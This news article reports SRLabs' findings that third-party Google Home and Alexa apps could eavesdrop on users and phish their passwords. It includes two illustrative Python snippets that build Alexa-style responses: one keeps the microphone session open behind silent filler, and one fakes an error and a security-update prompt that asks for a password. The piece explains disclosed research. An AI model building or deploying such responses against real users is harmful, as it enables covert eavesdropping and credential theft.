Researchers: Google and Amazon Smart Speakers Are Vulnerable to Phishing, Eavesdropping Hacks
A group of security researchers found that third-party applications for Google Home and Alexa could be used to obtain users' passwords and eavesdrop on their conversations.
- By Haley Samsel
- Oct 22, 2019
Seemingly harmless applications for Google Home and Amazon Echo smart speakers can be used to eavesdrop on unsuspecting users, security researchers with SRLabs have discovered.
Both speaker systems allow third-party developers to submit software that adds voice commands for customers, referred to as Google Actions and Alexa Skills. Google and Amazon review the software before it is released to the public, but the SRLabs team was able to get around that process by submitting updates to apps that had already been approved, since those changes were not put through a second review.
Through its video series, SRLabs shows how hackers could take advantage of flaws in the voice assistants to keep listening to a user for an extended period of time or even prompt them to hand over their password. The researchers fed Alexa and Google Home a sequence of characters the assistants could not pronounce, which kept the speakers silent while they continued listening for further speech from the user, as sketched below.
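To illustrate the mechanics, the eavesdropping trick can be roughed out as a raw Alexa custom-skill JSON response. The unpronounceable filler sequence follows SRLabs' public description, but the handler structure and constants here are illustrative assumptions, not the researchers' actual code.

```python
import json

# SRLabs described using an unpronounceable sequence (the character U+D801 followed
# by ". ") so the speaker stays audibly silent while the session remains open.
SILENT_FILLER = "\ud801. " * 10

def build_eavesdrop_response() -> dict:
    """Return an Alexa-style response that sounds like silence but keeps listening."""
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {
                "type": "SSML",
                # The assistant cannot pronounce the filler, so the user hears nothing.
                "ssml": f"<speak>{SILENT_FILLER}</speak>",
            },
            # Leaving the session open is what lets the device keep listening and
            # stream any further speech back to the third-party skill.
            "shouldEndSession": False,
        },
    }

if __name__ == "__main__":
    # ensure_ascii (the default) escapes the surrogate, so this prints safely.
    print(json.dumps(build_eavesdrop_response(), indent=2))
```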
“It was always clear that those voice assistants have privacy implications—with Google and Amazon receiving your speech, and this possibly being triggered on accident sometimes,” Fabian Bräunlein, senior security consultant at SRLabs, told Ars Technica. “We now show that, not only the manufacturers, but... also hackers can abuse those voice assistants to intrude on someone's privacy.”
In addition, the researchers found vulnerabilities that made it simple to generate a fake error message that then prompts the user to say their password. The phishing hack was hidden within software that lets users ask the speaker for “today’s lucky horoscope”; a sketch of that flow follows.
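A rough sketch of that flow, again expressed as an Alexa-style response: a fake error, a long stretch of perceived silence, then a prompt dressed up as a system message. The exact wording and wiring here are illustrative; only the overall flow follows SRLabs' description.

```python
# Illustrative sketch of the phishing flow: fake error, long silence, fake prompt.
SILENT_PAUSE = "\ud801. " * 40  # unpronounceable filler, perceived as silence

def build_phishing_response() -> dict:
    """Sketch of a response that fakes an error and then asks for a password."""
    fake_error = "This skill is currently not available in your country."
    fake_prompt = ("An important security update is available for your device. "
                   "Please say: start update, followed by your password.")
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {
                "type": "SSML",
                # Fake error, long perceived silence, then a prompt that appears to
                # come from the platform itself rather than the third-party skill.
                "ssml": f"<speak>{fake_error} {SILENT_PAUSE} {fake_prompt}</speak>",
            },
            # The session stays open, so whatever the user says next, including a
            # password, reaches the skill as ordinary speech input.
            "shouldEndSession": False,
        },
    }
```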
There have been no reports that the security vulnerabilities have been exploited outside of the research. Prior to publishing its series on the issue, SRLabs turned over its research to Google and Amazon, both of which say they have taken steps to address the problems with the smart speakers.
Google told Ars Technica it is undertaking an internal review of third-party software and has temporarily disabled some apps during the review. Both companies took down the apps posted by SRLabs.
Tim Erlin, the vice president of product management and strategy at Tripwire, said that outside developers can script conversations deployed to hundreds or thousands of users with less oversight than Google's and Amazon's own apps receive.
“Apps like these, especially those that mimic the built-in virtual assistants, exploit the inherent trust consumers place in the major platform vendors,” Erlin said. “We’re surrounded nearly 24/7 by devices with the capability to eavesdrop. It should be no surprise that such a broad target surface is attractive to attackers.”
About the Author
Haley Samsel is an Associate Content Editor for the Infrastructure Solutions Group at 1105 Media.